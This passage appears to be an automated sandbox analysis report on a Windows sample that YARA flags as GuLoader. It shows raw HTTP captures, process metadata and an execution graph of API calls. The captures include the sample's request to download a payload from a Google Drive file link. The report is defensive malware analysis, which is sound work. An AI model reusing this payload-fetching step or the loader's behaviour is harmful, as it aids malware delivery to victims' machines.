                                                                    Connection: close
                                                                    2024-12-03 16:27:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 6f 7a 35 6f 35 70 51 5a 5a 34 64 31 54 4a 71 32 52 6f 33 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="doz5o5pQZZ4d1TJq2Ro3WA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.549989172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:27:06 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:27:07 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:27:07 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: script-src 'nonce-0s42-i_EgOw521-LceO1ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:11:23:00
                                                                    Start date:03/12/2024
                                                                    Path:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\eAvqHiIsgR.exe"
                                                                    Imagebase:0x400000
                                                                    File size:882'600 bytes
                                                                    MD5 hash:61518CFDED3109FAC04EE916AB275C26
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:11:24:35
                                                                    Start date:03/12/2024
                                                                    Path:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\eAvqHiIsgR.exe"
                                                                    Imagebase:0x400000
                                                                    File size:882'600 bytes
                                                                    MD5 hash:61518CFDED3109FAC04EE916AB275C26
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:19.6%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:16.4%
                                                                      Total number of Nodes:1541
                                                                      Total number of Limit Nodes:46
                                                                      execution_graph 4866 401d44 4867 402bac 17 API calls 4866->4867 4868 401d52 SetWindowLongA 4867->4868 4869 402a5a 4868->4869 3864 72a42921 3865 72a42971 3864->3865 3866 72a42931 VirtualProtect 3864->3866 3866->3865 3867 401ec5 3875 402bac 3867->3875 3869 401ecb 3870 402bac 17 API calls 3869->3870 3871 401ed7 3870->3871 3872 401ee3 ShowWindow 3871->3872 3873 401eee EnableWindow 3871->3873 3874 402a5a 3872->3874 3873->3874 3878 40618a 3875->3878 3877 402bc1 3877->3869 3891 406197 3878->3891 3879 4063b9 3880 4063ce 3879->3880 3911 4060f7 lstrcpynA 3879->3911 3880->3877 3882 406393 lstrlenA 3882->3891 3885 40618a 10 API calls 3885->3882 3887 4062af GetSystemDirectoryA 3887->3891 3888 4062c2 GetWindowsDirectoryA 3888->3891 3890 4062f6 SHGetSpecialFolderLocation 3890->3891 3894 40630e SHGetPathFromIDListA CoTaskMemFree 3890->3894 3891->3879 3891->3882 3891->3885 3891->3887 3891->3888 3891->3890 3892 40618a 10 API calls 3891->3892 3893 40633c lstrcatA 3891->3893 3895 405fde 3891->3895 3900 4063d2 3891->3900 3909 406055 wsprintfA 3891->3909 3910 4060f7 lstrcpynA 3891->3910 3892->3891 3893->3891 3894->3891 3912 405f7d 3895->3912 3898 406012 RegQueryValueExA RegCloseKey 3899 406041 3898->3899 3899->3891 3906 4063de 3900->3906 3901 406446 3902 40644a CharPrevA 3901->3902 3904 406465 3901->3904 3902->3901 3903 40643b CharNextA 3903->3901 3903->3906 3904->3891 3906->3901 3906->3903 3907 406429 CharNextA 3906->3907 3908 406436 CharNextA 3906->3908 3916 405aba 3906->3916 3907->3906 3908->3903 3909->3891 3910->3891 3911->3880 3913 405f8c 3912->3913 3914 405f90 3913->3914 3915 405f95 RegOpenKeyExA 3913->3915 3914->3898 3914->3899 3915->3914 3917 405ac0 3916->3917 3918 405ad3 3917->3918 3919 405ac6 CharNextA 3917->3919 3918->3906 3919->3917 3920 401746 3926 402bce 3920->3926 3924 401754 3925 405cbf 2 API calls 3924->3925 3925->3924 3927 402bda 3926->3927 3928 40618a 17 API calls 3927->3928 3929 402bfb 3928->3929 3930 40174d 3929->3930 3931 4063d2 5 API calls 3929->3931 3932 405cbf 3930->3932 3931->3930 3933 405cca GetTickCount GetTempFileNameA 3932->3933 3934 405cfb 3933->3934 3935 405cf7 3933->3935 3934->3924 3935->3933 3935->3934 4870 4045c6 4871 4045d6 4870->4871 4872 4045fc 4870->4872 4877 40417b 4871->4877 4880 4041e2 4872->4880 4876 4045e3 SetDlgItemTextA 4876->4872 4878 40618a 17 API calls 4877->4878 4879 404186 SetDlgItemTextA 4878->4879 4879->4876 4881 4042a5 4880->4881 4882 4041fa GetWindowLongA 4880->4882 4882->4881 4883 40420f 4882->4883 4883->4881 4884 40423c GetSysColor 4883->4884 4885 40423f 4883->4885 4884->4885 4886 404245 SetTextColor 4885->4886 4887 40424f SetBkMode 4885->4887 4886->4887 4888 404267 GetSysColor 4887->4888 4889 40426d 4887->4889 4888->4889 4890 404274 SetBkColor 4889->4890 4891 40427e 4889->4891 4890->4891 4891->4881 4892 404291 DeleteObject 4891->4892 4893 404298 CreateBrushIndirect 4891->4893 4892->4893 4893->4881 4894 401947 4895 402bce 17 API calls 4894->4895 4896 40194e lstrlenA 4895->4896 4897 402620 4896->4897 3936 403348 SetErrorMode GetVersion 3937 403389 3936->3937 3940 40338f 3936->3940 3938 406500 5 API calls 3937->3938 3938->3940 4026 406492 GetSystemDirectoryA 3940->4026 3941 4033a5 lstrlenA 3941->3940 3942 4033b4 3941->3942 4029 406500 GetModuleHandleA 3942->4029 3945 406500 5 API calls 3946 4033c2 3945->3946 3947 406500 5 API calls 3946->3947 3948 4033ce #17 OleInitialize SHGetFileInfoA 3947->3948 4035 4060f7 lstrcpynA 3948->4035 3951 40341a GetCommandLineA 4036 4060f7 lstrcpynA 3951->4036 3953 40342c 3954 405aba CharNextA 3953->3954 3955 403455 CharNextA 3954->3955 3963 403465 3955->3963 3956 40352f 3957 403542 GetTempPathA 3956->3957 4037 403317 3957->4037 3959 40355a 3960 4035b4 DeleteFileA 3959->3960 3961 40355e GetWindowsDirectoryA lstrcatA 3959->3961 4047 402ea1 GetTickCount GetModuleFileNameA 3960->4047 3964 403317 12 API calls 3961->3964 3962 405aba CharNextA 3962->3963 3963->3956 3963->3962 3967 403531 3963->3967 3966 40357a 3964->3966 3966->3960 3971 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3966->3971 4132 4060f7 lstrcpynA 3967->4132 3968 4035c8 3969 40365e 3968->3969 3972 40364e 3968->3972 3976 405aba CharNextA 3968->3976 4149 403830 3969->4149 3974 403317 12 API calls 3971->3974 4075 40390a 3972->4075 3978 4035ac 3974->3978 3979 4035e3 3976->3979 3978->3960 3978->3969 3986 403629 3979->3986 3987 40368e 3979->3987 3980 403796 3983 403818 ExitProcess 3980->3983 3984 40379e GetCurrentProcess OpenProcessToken 3980->3984 3981 403678 4156 405813 3981->4156 3989 4037e9 3984->3989 3990 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3984->3990 4133 405b7d 3986->4133 4160 40577e 3987->4160 3993 406500 5 API calls 3989->3993 3990->3989 3996 4037f0 3993->3996 3997 403805 ExitWindowsEx 3996->3997 4000 403811 3996->4000 3997->3983 3997->4000 3998 4036a4 lstrcatA 3999 4036af lstrcatA lstrcmpiA 3998->3999 3999->3969 4002 4036cb 3999->4002 4180 40140b 4000->4180 4005 4036d0 4002->4005 4006 4036d7 4002->4006 4004 403643 4148 4060f7 lstrcpynA 4004->4148 4163 4056e4 CreateDirectoryA 4005->4163 4168 405761 CreateDirectoryA 4006->4168 4011 4036dc SetCurrentDirectoryA 4012 4036f6 4011->4012 4013 4036eb 4011->4013 4172 4060f7 lstrcpynA 4012->4172 4171 4060f7 lstrcpynA 4013->4171 4016 40618a 17 API calls 4017 403735 DeleteFileA 4016->4017 4018 403742 CopyFileA 4017->4018 4023 403704 4017->4023 4018->4023 4019 40378a 4020 405ed6 36 API calls 4019->4020 4020->3969 4022 40618a 17 API calls 4022->4023 4023->4016 4023->4019 4023->4022 4025 403776 CloseHandle 4023->4025 4173 405ed6 MoveFileExA 4023->4173 4177 405796 CreateProcessA 4023->4177 4025->4023 4027 4064b4 wsprintfA LoadLibraryExA 4026->4027 4027->3941 4030 406526 GetProcAddress 4029->4030 4031 40651c 4029->4031 4033 4033bb 4030->4033 4032 406492 3 API calls 4031->4032 4034 406522 4032->4034 4033->3945 4034->4030 4034->4033 4035->3951 4036->3953 4038 4063d2 5 API calls 4037->4038 4040 403323 4038->4040 4039 40332d 4039->3959 4040->4039 4183 405a8f lstrlenA CharPrevA 4040->4183 4043 405761 2 API calls 4044 40333b 4043->4044 4045 405cbf 2 API calls 4044->4045 4046 403346 4045->4046 4046->3959 4186 405c90 GetFileAttributesA CreateFileA 4047->4186 4049 402ee1 4067 402ef1 4049->4067 4187 4060f7 lstrcpynA 4049->4187 4051 402f07 4188 405ad6 lstrlenA 4051->4188 4055 402f18 GetFileSize 4060 402f2f 4055->4060 4072 403012 4055->4072 4057 40301b 4059 40304b GlobalAlloc 4057->4059 4057->4067 4228 403300 SetFilePointer 4057->4228 4204 403300 SetFilePointer 4059->4204 4062 40307e 4060->4062 4060->4067 4071 402e3d 6 API calls 4060->4071 4060->4072 4225 4032ea 4060->4225 4064 402e3d 6 API calls 4062->4064 4064->4067 4065 403034 4068 4032ea ReadFile 4065->4068 4066 403066 4205 4030d8 4066->4205 4067->3968 4070 40303f 4068->4070 4070->4059 4070->4067 4071->4060 4193 402e3d 4072->4193 4074 4030af SetFilePointer 4074->4067 4076 406500 5 API calls 4075->4076 4077 40391e 4076->4077 4078 403924 4077->4078 4079 403936 4077->4079 4257 406055 wsprintfA 4078->4257 4080 405fde 3 API calls 4079->4080 4081 403961 4080->4081 4082 40397f lstrcatA 4081->4082 4085 405fde 3 API calls 4081->4085 4084 403934 4082->4084 4249 403bcf 4084->4249 4085->4082 4088 405b7d 18 API calls 4089 4039b1 4088->4089 4090 403a3a 4089->4090 4093 405fde 3 API calls 4089->4093 4091 405b7d 18 API calls 4090->4091 4092 403a40 4091->4092 4094 403a50 LoadImageA 4092->4094 4096 40618a 17 API calls 4092->4096 4095 4039dd 4093->4095 4097 403af6 4094->4097 4098 403a77 RegisterClassA 4094->4098 4095->4090 4099 4039f9 lstrlenA 4095->4099 4103 405aba CharNextA 4095->4103 4096->4094 4102 40140b 2 API calls 4097->4102 4100 403b00 4098->4100 4101 403aad SystemParametersInfoA CreateWindowExA 4098->4101 4104 403a07 lstrcmpiA 4099->4104 4105 403a2d 4099->4105 4100->3969 4101->4097 4108 403afc 4102->4108 4106 4039f7 4103->4106 4104->4105 4107 403a17 GetFileAttributesA 4104->4107 4109 405a8f 3 API calls 4105->4109 4106->4099 4110 403a23 4107->4110 4108->4100 4111 403bcf 18 API calls 4108->4111 4112 403a33 4109->4112 4110->4105 4113 405ad6 2 API calls 4110->4113 4114 403b0d 4111->4114 4258 4060f7 lstrcpynA 4112->4258 4113->4105 4116 403b19 ShowWindow 4114->4116 4117 403b9c 4114->4117 4119 406492 3 API calls 4116->4119 4259 4052f0 OleInitialize 4117->4259 4121 403b31 4119->4121 4120 403ba2 4123 403ba6 4120->4123 4124 403bbe 4120->4124 4122 403b3f GetClassInfoA 4121->4122 4125 406492 3 API calls 4121->4125 4127 403b53 GetClassInfoA RegisterClassA 4122->4127 4128 403b69 DialogBoxParamA 4122->4128 4123->4100 4130 40140b 2 API calls 4123->4130 4126 40140b 2 API calls 4124->4126 4125->4122 4126->4100 4127->4128 4129 40140b 2 API calls 4128->4129 4131 403b91 4129->4131 4130->4100 4131->4100 4132->3957 4277 4060f7 lstrcpynA 4133->4277 4135 405b8e 4278 405b28 CharNextA CharNextA 4135->4278 4138 403634 4138->3969 4147 4060f7 lstrcpynA 4138->4147 4139 4063d2 5 API calls 4145 405ba4 4139->4145 4140 405bcf lstrlenA 4141 405bda 4140->4141 4140->4145 4142 405a8f 3 API calls 4141->4142 4144 405bdf GetFileAttributesA 4142->4144 4144->4138 4145->4138 4145->4140 4146 405ad6 2 API calls 4145->4146 4284 40646b FindFirstFileA 4145->4284 4146->4140 4147->4004 4148->3972 4150 403848 4149->4150 4151 40383a CloseHandle 4149->4151 4287 403875 4150->4287 4151->4150 4157 405828 4156->4157 4158 403686 ExitProcess 4157->4158 4159 40583c MessageBoxIndirectA 4157->4159 4159->4158 4161 406500 5 API calls 4160->4161 4162 403693 lstrcatA 4161->4162 4162->3998 4162->3999 4164 405735 GetLastError 4163->4164 4166 4036d5 4163->4166 4165 405744 SetFileSecurityA 4164->4165 4164->4166 4165->4166 4167 40575a GetLastError 4165->4167 4166->4011 4167->4166 4169 405771 4168->4169 4170 405775 GetLastError 4168->4170 4169->4011 4170->4169 4171->4012 4172->4023 4174 405ef7 4173->4174 4175 405eea 4173->4175 4174->4023 4344 405d66 4175->4344 4178 4057d5 4177->4178 4179 4057c9 CloseHandle 4177->4179 4178->4023 4179->4178 4181 401389 2 API calls 4180->4181 4182 401420 4181->4182 4182->3983 4184 403335 4183->4184 4185 405aa9 lstrcatA 4183->4185 4184->4043 4185->4184 4186->4049 4187->4051 4189 405ae3 4188->4189 4190 402f0d 4189->4190 4191 405ae8 CharPrevA 4189->4191 4192 4060f7 lstrcpynA 4190->4192 4191->4189 4191->4190 4192->4055 4194 402e46 4193->4194 4195 402e5e 4193->4195 4196 402e56 4194->4196 4197 402e4f DestroyWindow 4194->4197 4198 402e66 4195->4198 4199 402e6e GetTickCount 4195->4199 4196->4057 4197->4196 4229 40653c 4198->4229 4201 402e7c CreateDialogParamA ShowWindow 4199->4201 4202 402e9f 4199->4202 4201->4202 4202->4057 4204->4066 4206 4030ee 4205->4206 4207 40311c 4206->4207 4235 403300 SetFilePointer 4206->4235 4209 4032ea ReadFile 4207->4209 4210 403127 4209->4210 4211 403283 4210->4211 4212 403139 GetTickCount 4210->4212 4214 403072 4210->4214 4213 4032c5 4211->4213 4218 403287 4211->4218 4212->4214 4221 403188 4212->4221 4216 4032ea ReadFile 4213->4216 4214->4067 4214->4074 4215 4032ea ReadFile 4215->4221 4216->4214 4217 4032ea ReadFile 4217->4218 4218->4214 4218->4217 4219 405d37 WriteFile 4218->4219 4219->4218 4220 4031de GetTickCount 4220->4221 4221->4214 4221->4215 4221->4220 4222 403203 MulDiv wsprintfA 4221->4222 4233 405d37 WriteFile 4221->4233 4236 40521e 4222->4236 4247 405d08 ReadFile 4225->4247 4228->4065 4230 406559 PeekMessageA 4229->4230 4231 402e6c 4230->4231 4232 40654f DispatchMessageA 4230->4232 4231->4057 4232->4230 4234 405d55 4233->4234 4234->4221 4235->4207 4237 405239 4236->4237 4246 4052dc 4236->4246 4238 405256 lstrlenA 4237->4238 4239 40618a 17 API calls 4237->4239 4240 405264 lstrlenA 4238->4240 4241 40527f 4238->4241 4239->4238 4242 405276 lstrcatA 4240->4242 4240->4246 4243 405292 4241->4243 4244 405285 SetWindowTextA 4241->4244 4242->4241 4245 405298 SendMessageA SendMessageA SendMessageA 4243->4245 4243->4246 4244->4243 4245->4246 4246->4221 4248 4032fd 4247->4248 4248->4060 4250 403be3 4249->4250 4266 406055 wsprintfA 4250->4266 4252 403c54 4267 403c88 4252->4267 4254 40398f 4254->4088 4255 403c59 4255->4254 4256 40618a 17 API calls 4255->4256 4256->4255 4257->4084 4258->4090 4270 4041c7 4259->4270 4261 4041c7 SendMessageA 4263 40534c OleUninitialize 4261->4263 4262 405313 4265 40533a 4262->4265 4273 401389 4262->4273 4263->4120 4265->4261 4266->4252 4268 40618a 17 API calls 4267->4268 4269 403c96 SetWindowTextA 4268->4269 4269->4255 4271 4041d0 SendMessageA 4270->4271 4272 4041df 4270->4272 4271->4272 4272->4262 4275 401390 4273->4275 4274 4013fe 4274->4262 4275->4274 4276 4013cb MulDiv SendMessageA 4275->4276 4276->4275 4277->4135 4279 405b43 4278->4279 4281 405b53 4278->4281 4279->4281 4282 405b4e CharNextA 4279->4282 4280 405b73 4280->4138 4280->4139 4281->4280 4283 405aba CharNextA 4281->4283 4282->4280 4283->4281 4285 406481 FindClose 4284->4285 4286 40648c 4284->4286 4285->4286 4286->4145 4288 403883 4287->4288 4289 40384d 4288->4289 4290 403888 FreeLibrary GlobalFree 4288->4290 4291 4058bf 4289->4291 4290->4289 4290->4290 4292 405b7d 18 API calls 4291->4292 4293 4058df 4292->4293 4294 4058e7 DeleteFileA 4293->4294 4295 4058fe 4293->4295 4296 403667 OleUninitialize 4294->4296 4297 405a2c 4295->4297 4331 4060f7 lstrcpynA 4295->4331 4296->3980 4296->3981 4297->4296 4302 40646b 2 API calls 4297->4302 4299 405924 4300 405937 4299->4300 4301 40592a lstrcatA 4299->4301 4304 405ad6 2 API calls 4300->4304 4303 40593d 4301->4303 4305 405a50 4302->4305 4306 40594b lstrcatA 4303->4306 4308 405956 lstrlenA FindFirstFileA 4303->4308 4304->4303 4305->4296 4307 405a54 4305->4307 4306->4308 4309 405a8f 3 API calls 4307->4309 4308->4297 4313 40597a 4308->4313 4310 405a5a 4309->4310 4312 405877 5 API calls 4310->4312 4311 405aba CharNextA 4311->4313 4314 405a66 4312->4314 4313->4311 4316 405a0b FindNextFileA 4313->4316 4327 4059cc 4313->4327 4332 4060f7 lstrcpynA 4313->4332 4315 405a80 4314->4315 4318 405a6a 4314->4318 4319 40521e 24 API calls 4315->4319 4316->4313 4320 405a23 FindClose 4316->4320 4318->4296 4321 40521e 24 API calls 4318->4321 4319->4296 4320->4297 4322 405a77 4321->4322 4323 405ed6 36 API calls 4322->4323 4326 405a7e 4323->4326 4325 4058bf 60 API calls 4325->4327 4326->4296 4327->4316 4327->4325 4328 40521e 24 API calls 4327->4328 4329 40521e 24 API calls 4327->4329 4330 405ed6 36 API calls 4327->4330 4333 405877 4327->4333 4328->4316 4329->4327 4330->4327 4331->4299 4332->4313 4341 405c6b GetFileAttributesA 4333->4341 4336 4058a4 4336->4327 4337 405892 RemoveDirectoryA 4339 4058a0 4337->4339 4338 40589a DeleteFileA 4338->4339 4339->4336 4340 4058b0 SetFileAttributesA 4339->4340 4340->4336 4342 405883 4341->4342 4343 405c7d SetFileAttributesA 4341->4343 4342->4336 4342->4337 4342->4338 4343->4342 4345 405db2 GetShortPathNameA 4344->4345 4346 405d8c 4344->4346 4348 405ed1 4345->4348 4349 405dc7 4345->4349 4371 405c90 GetFileAttributesA CreateFileA 4346->4371 4348->4174 4349->4348 4351 405dcf wsprintfA 4349->4351 4350 405d96 CloseHandle GetShortPathNameA 4350->4348 4352 405daa 4350->4352 4353 40618a 17 API calls 4351->4353 4352->4345 4352->4348 4354 405df7 4353->4354 4372 405c90 GetFileAttributesA CreateFileA 4354->4372 4356 405e04 4356->4348 4357 405e13 GetFileSize GlobalAlloc 4356->4357 4358 405e35 4357->4358 4359 405eca CloseHandle 4357->4359 4360 405d08 ReadFile 4358->4360 4359->4348 4361 405e3d 4360->4361 4361->4359 4373 405bf5 lstrlenA 4361->4373 4364 405e54 lstrcpyA 4367 405e76 4364->4367 4365 405e68 4366 405bf5 4 API calls 4365->4366 4366->4367 4368 405ead SetFilePointer 4367->4368 4369 405d37 WriteFile 4368->4369 4370 405ec3 GlobalFree 4369->4370 4370->4359 4371->4350 4372->4356 4374 405c36 lstrlenA 4373->4374 4375 405c3e 4374->4375 4376 405c0f lstrcmpiA 4374->4376 4375->4364 4375->4365 4376->4375 4377 405c2d CharNextA 4376->4377 4377->4374 4898 4038c8 4899 4038d3 4898->4899 4900 4038da GlobalAlloc 4899->4900 4901 4038d7 4899->4901 4900->4901 4905 401fcb 4906 402bce 17 API calls 4905->4906 4907 401fd2 4906->4907 4908 40646b 2 API calls 4907->4908 4909 401fd8 4908->4909 4911 401fea 4909->4911 4912 406055 wsprintfA 4909->4912 4912->4911 4913 72a41837 4914 72a4185a 4913->4914 4915 72a4188a GlobalFree 4914->4915 4916 72a4189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4914->4916 4915->4916 4917 72a41266 2 API calls 4916->4917 4918 72a41a1e GlobalFree GlobalFree 4917->4918 4399 4014d6 4400 402bac 17 API calls 4399->4400 4401 4014dc Sleep 4400->4401 4403 402a5a 4401->4403 4416 401759 4417 402bce 17 API calls 4416->4417 4418 401760 4417->4418 4419 401786 4418->4419 4420 40177e 4418->4420 4457 4060f7 lstrcpynA 4419->4457 4456 4060f7 lstrcpynA 4420->4456 4423 401784 4427 4063d2 5 API calls 4423->4427 4424 401791 4425 405a8f 3 API calls 4424->4425 4426 401797 lstrcatA 4425->4426 4426->4423 4434 4017a3 4427->4434 4428 4017e4 4430 405c6b 2 API calls 4428->4430 4429 40646b 2 API calls 4429->4434 4430->4434 4432 4017ba CompareFileTime 4432->4434 4433 40187e 4435 40521e 24 API calls 4433->4435 4434->4428 4434->4429 4434->4432 4434->4433 4437 4060f7 lstrcpynA 4434->4437 4444 40618a 17 API calls 4434->4444 4450 405813 MessageBoxIndirectA 4434->4450 4453 401855 4434->4453 4455 405c90 GetFileAttributesA CreateFileA 4434->4455 4438 401888 4435->4438 4436 40521e 24 API calls 4443 40186a 4436->4443 4437->4434 4439 4030d8 31 API calls 4438->4439 4440 40189b 4439->4440 4441 4018af SetFileTime 4440->4441 4442 4018c1 CloseHandle 4440->4442 4441->4442 4442->4443 4445 4018d2 4442->4445 4444->4434 4446 4018d7 4445->4446 4447 4018ea 4445->4447 4448 40618a 17 API calls 4446->4448 4449 40618a 17 API calls 4447->4449 4451 4018df lstrcatA 4448->4451 4452 4018f2 4449->4452 4450->4434 4451->4452 4452->4443 4454 405813 MessageBoxIndirectA 4452->4454 4453->4436 4453->4443 4454->4443 4455->4434 4456->4423 4457->4424 4919 72a4103d 4922 72a4101b 4919->4922 4929 72a414bb 4922->4929 4924 72a41020 4925 72a41024 4924->4925 4926 72a41027 GlobalAlloc 4924->4926 4927 72a414e2 3 API calls 4925->4927 4926->4925 4928 72a4103b 4927->4928 4930 72a414c1 4929->4930 4931 72a414c7 4930->4931 4932 72a414d3 GlobalFree 4930->4932 4931->4924 4932->4924 4933 401959 4934 402bac 17 API calls 4933->4934 4935 401960 4934->4935 4936 402bac 17 API calls 4935->4936 4937 40196d 4936->4937 4938 402bce 17 API calls 4937->4938 4939 401984 lstrlenA 4938->4939 4940 401994 4939->4940 4941 4019d4 4940->4941 4945 4060f7 lstrcpynA 4940->4945 4943 4019c4 4943->4941 4944 4019c9 lstrlenA 4943->4944 4944->4941 4945->4943 4946 72a41638 4947 72a41667 4946->4947 4948 72a41a98 18 API calls 4947->4948 4949 72a4166e 4948->4949 4950 72a41675 4949->4950 4951 72a41681 4949->4951 4952 72a41266 2 API calls 4950->4952 4953 72a416a8 4951->4953 4954 72a4168b 4951->4954 4957 72a4167f 4952->4957 4955 72a416d2 4953->4955 4956 72a416ae 4953->4956 4958 72a414e2 3 API calls 4954->4958 4960 72a414e2 3 API calls 4955->4960 4959 72a41559 3 API calls 4956->4959 4961 72a41690 4958->4961 4963 72a416b3 4959->4963 4960->4957 4962 72a41559 3 API calls 4961->4962 4964 72a41696 4962->4964 4965 72a41266 2 API calls 4963->4965 4966 72a41266 2 API calls 4964->4966 4967 72a416b9 GlobalFree 4965->4967 4968 72a4169c GlobalFree 4966->4968 4967->4957 4969 72a416cd GlobalFree 4967->4969 4968->4957 4969->4957 4970 40535c 4971 405507 4970->4971 4972 40537e GetDlgItem GetDlgItem GetDlgItem 4970->4972 4974 405537 4971->4974 4975 40550f GetDlgItem CreateThread CloseHandle 4971->4975 5015 4041b0 SendMessageA 4972->5015 4977 405565 4974->4977 4978 405586 4974->4978 4979 40554d ShowWindow ShowWindow 4974->4979 4975->4974 4976 4053ee 4982 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4976->4982 4980 4055c0 4977->4980 4984 405575 4977->4984 4985 405599 ShowWindow 4977->4985 4981 4041e2 8 API calls 4978->4981 5017 4041b0 SendMessageA 4979->5017 4980->4978 4991 4055cd SendMessageA 4980->4991 4986 405592 4981->4986 4989 405463 4982->4989 4990 405447 SendMessageA SendMessageA 4982->4990 5018 404154 4984->5018 4987 4055b9 4985->4987 4988 4055ab 4985->4988 4994 404154 SendMessageA 4987->4994 4993 40521e 24 API calls 4988->4993 4995 405476 4989->4995 4996 405468 SendMessageA 4989->4996 4990->4989 4991->4986 4997 4055e6 CreatePopupMenu 4991->4997 4993->4987 4994->4980 4999 40417b 18 API calls 4995->4999 4996->4995 4998 40618a 17 API calls 4997->4998 5000 4055f6 AppendMenuA 4998->5000 5001 405486 4999->5001 5002 405614 GetWindowRect 5000->5002 5003 405627 TrackPopupMenu 5000->5003 5004 4054c3 GetDlgItem SendMessageA 5001->5004 5005 40548f ShowWindow 5001->5005 5002->5003 5003->4986 5007 405643 5003->5007 5004->4986 5006 4054ea SendMessageA SendMessageA 5004->5006 5008 4054b2 5005->5008 5009 4054a5 ShowWindow 5005->5009 5006->4986 5010 405662 SendMessageA 5007->5010 5016 4041b0 SendMessageA 